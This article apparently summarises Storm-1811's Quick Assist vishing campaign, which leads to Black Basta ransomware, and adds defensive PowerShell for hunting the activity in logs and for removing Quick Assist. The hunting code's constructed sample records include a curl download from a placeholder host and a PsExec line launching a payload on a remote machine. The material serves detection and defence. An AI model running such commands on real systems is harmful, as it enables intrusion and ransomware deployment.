Storm-1811 Exploits Quick Assist for Social Engineering Attacks

The Microsoft Threat Intelligence team has uncovered a new campaign by the group Storm-1811 that abuses the Quick Assist tool to conduct social engineering attacks against users.

Quick Assist is a legitimate Microsoft application that lets one user view or take control of another user's device over a remote session in order to resolve technical issues; the person being helped enters a security code supplied by the helper and then chooses whether to grant control. The application is installed by default on Windows 11 devices.

Storm-1811 abuses Quick Assist as a social engineering vector rather than exploiting any flaw in the tool: the attacker poses as a trusted contact and talks the victim into starting a session and granting control, which becomes the initial access to the device. To make the pretext convincing, the attacker first runs a link listing attack, a form of email bombing in which the victim's email address is subscribed to many mailing lists and subscription services so that the inbox floods with spam.

The attacker then phones the victim, posing as a tech support agent offering to fix the spam problem, and walks the victim through opening Quick Assist, entering the security code and granting control. Once control is granted, the attacker runs curl commands to download and execute malicious files. That foothold is used to enumerate the domain and move laterally across the network, after which PsExec is used to deploy the Black Basta ransomware.
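The chain described above leaves a recognisable trace in process-creation telemetry: curl and PsExec launched from an interactive logon session in which Quick Assist is running. The following PowerShell is an added hunting example written for this page, not a query from Microsoft's report. It assumes Windows Security event 4688 with command-line auditing enabled (the EventData field names used, NewProcessName, ParentProcessName, CommandLine and SubjectLogonId, are the standard 4688 fields); the sample records at the bottom are constructed so the logic can be exercised offline.

```powershell
# Added example: flag curl / PsExec activity inside a logon session where
# QuickAssist.exe was started. Assumes Security 4688 events with command-line
# auditing; the sample records below are constructed for an offline run.

function ConvertTo-ProcessRecord {
    # Flatten a 4688 EventLogRecord into the few fields the hunt needs.
    param([Parameter(ValueFromPipeline)] $Event)
    process {
        $x = [xml]$Event.ToXml()
        $d = @{}
        foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
        [pscustomobject]@{
            Time    = $Event.TimeCreated
            LogonId = $d['SubjectLogonId']
            Image   = $d['NewProcessName']
            Parent  = $d['ParentProcessName']
            Cmd     = $d['CommandLine']
        }
    }
}

function Find-QuickAssistAbuse {
    # For every logon session that launched Quick Assist, report downloads via
    # curl and PsExec use within $WindowMinutes of the Quick Assist start.
    param(
        [Parameter(Mandatory)] [object[]] $Records,
        [int] $WindowMinutes = 60
    )
    $qaSessions = $Records |
        Where-Object { $_.Image -match '\\QuickAssist\.exe$' } |
        Group-Object LogonId
    foreach ($g in $qaSessions) {
        $start = ($g.Group | Sort-Object Time | Select-Object -First 1).Time
        $end   = $start.AddMinutes($WindowMinutes)
        $Records | Where-Object {
            $_.LogonId -eq $g.Name -and $_.Time -ge $start -and $_.Time -le $end -and (
                ($_.Image -match '\\curl\.exe$' -and $_.Cmd -match 'https?://') -or
                ($_.Image -match '\\psexe(c|svc)(64)?\.exe$') -or
                ($_.Image -match '\\(cmd|powershell)\.exe$' -and $_.Cmd -match '\bcurl\b')
            )
        } | ForEach-Object {
            [pscustomobject]@{
                Session          = $g.Name
                QuickAssistStart = $start
                Time             = $_.Time
                Image            = $_.Image
                CommandLine      = $_.Cmd
            }
        }
    }
}

# Live use (elevated):
#   $recs = Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4688; StartTime=(Get-Date).AddDays(-1)} |
#           ConvertTo-ProcessRecord
#   Find-QuickAssistAbuse -Records $recs | Format-Table -AutoSize

# Constructed sample records (paths, logon IDs and URLs are made up).
$t = Get-Date '2024-04-20T10:00:00'
$sample = @(
    [pscustomobject]@{ Time=$t;                LogonId='0x3e7a1'; Image='C:\Windows\System32\QuickAssist.exe'; Parent='C:\Windows\explorer.exe';       Cmd='QuickAssist.exe' }
    [pscustomobject]@{ Time=$t.AddMinutes(4);  LogonId='0x3e7a1'; Image='C:\Windows\System32\cmd.exe';         Parent='C:\Windows\explorer.exe';       Cmd='cmd.exe' }
    [pscustomobject]@{ Time=$t.AddMinutes(5);  LogonId='0x3e7a1'; Image='C:\Windows\System32\curl.exe';        Parent='C:\Windows\System32\cmd.exe';   Cmd='curl -o C:\Users\Public\fix.zip http://example.invalid/fix.zip' }
    [pscustomobject]@{ Time=$t.AddMinutes(40); LogonId='0x3e7a1'; Image='C:\Tools\PsExec64.exe';               Parent='C:\Windows\System32\cmd.exe';   Cmd='PsExec64.exe \\FS01 -s cmd /c start payload.exe' }
    [pscustomobject]@{ Time=$t.AddMinutes(6);  LogonId='0x1ab2';  Image='C:\Windows\System32\curl.exe';        Parent='C:\Windows\System32\cmd.exe';   Cmd='curl https://example.invalid/' }  # other session: not flagged
)
Find-QuickAssistAbuse -Records $sample | Format-Table -AutoSize
```

Run against the constructed sample, the hunt returns the curl download and the PsExec launch from session 0x3e7a1 and ignores the curl in the unrelated session. On real data, tune the window to the dwell time you expect and add the session's interactive user to the output; the same logic maps directly onto Sysmon event ID 1 (Image, ParentImage, CommandLine, LogonId).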

The campaign, which began in mid-April 2024, targets a range of industries including manufacturing, construction, food, and transportation, which points to the opportunistic rather than targeted nature of the attacks.

Organizations are advised to block or uninstall Quick Assist and similar remote-assistance and remote management tools wherever they are not in use, and to train employees to recognize such scams, in particular never to grant remote access in response to an unsolicited call.
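As an added example of the uninstall step (this is not Microsoft's guidance verbatim, but an illustration written for this page), the PowerShell below audits whether Quick Assist is present on a Windows 10/11 host and, with `-Remove`, uninstalls it. It assumes an elevated session and the two identifiers under which Quick Assist ships: the Features on Demand capability name matching `App.Support.QuickAssist*` and the Store package name `MicrosoftCorporationII.QuickAssist`.

```powershell
# Added example: audit and optionally remove Quick Assist. Run elevated.
# Assumed identifiers: capability 'App.Support.QuickAssist*' (Features on
# Demand build) and Appx package 'MicrosoftCorporationII.QuickAssist'
# (Store build). Supports -WhatIf through ShouldProcess.
[CmdletBinding(SupportsShouldProcess)]
param([switch] $Remove)

function Get-QuickAssistState {
    # Three places Quick Assist can live: the Windows capability, the Store
    # package installed for existing users, and the provisioned package that
    # new user profiles would receive.
    $cap  = Get-WindowsCapability -Online -Name 'App.Support.QuickAssist*' -ErrorAction SilentlyContinue
    $pkg  = Get-AppxPackage -AllUsers -Name 'MicrosoftCorporationII.QuickAssist' -ErrorAction SilentlyContinue
    $prov = Get-AppxProvisionedPackage -Online -ErrorAction SilentlyContinue |
            Where-Object DisplayName -eq 'MicrosoftCorporationII.QuickAssist'
    [pscustomobject]@{
        Capability   = @($cap | Where-Object State -eq 'Installed' | ForEach-Object Name)
        StorePackage = @($pkg  | ForEach-Object PackageFullName)
        Provisioned  = @($prov | ForEach-Object PackageName)
        Installed    = ([bool]$cap -and ($cap.State -contains 'Installed')) -or [bool]$pkg -or [bool]$prov
    }
}

function Remove-QuickAssist {
    [CmdletBinding(SupportsShouldProcess)]
    param()
    $s = Get-QuickAssistState
    foreach ($name in $s.Capability) {
        if ($PSCmdlet.ShouldProcess($name, 'Remove-WindowsCapability')) {
            Remove-WindowsCapability -Online -Name $name | Out-Null
        }
    }
    foreach ($full in $s.StorePackage) {
        if ($PSCmdlet.ShouldProcess($full, 'Remove-AppxPackage -AllUsers')) {
            Remove-AppxPackage -Package $full -AllUsers
        }
    }
    foreach ($p in $s.Provisioned) {
        if ($PSCmdlet.ShouldProcess($p, 'Remove-AppxProvisionedPackage')) {
            Remove-AppxProvisionedPackage -Online -PackageName $p | Out-Null
        }
    }
    # Re-audit so the caller sees what is left.
    Get-QuickAssistState
}

$before = Get-QuickAssistState
Write-Host "Quick Assist present: $($before.Installed)"
$before | Format-List Capability, StorePackage, Provisioned

if ($Remove) {
    $after = Remove-QuickAssist
    Write-Host "Quick Assist present after removal: $($after.Installed)"
}
```

Run it with `-Remove -WhatIf` first to see what would be uninstalled. Two caveats a practitioner should keep in mind: removing the provisioned package stops new profiles from receiving the app, but a user with Store access can reinstall it, so pair removal with AppLocker or WDAC rules (or Store restrictions) where the tool is not wanted; and an attacker who cannot use Quick Assist will simply ask the victim to install another remote tool, so the user training in the advice above matters as much as the uninstall.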

Storm-1811 is a financially motivated cybercriminal group known for deploying the Black Basta ransomware. Its intrusions begin with vishing calls in which the operators impersonate Microsoft technical support or the victim company's own IT staff and persuade the victim either to install remote monitoring and management (RMM) tools or to grant a Quick Assist session. QakBot, Cobalt Strike and finally Black Basta are then delivered to the device.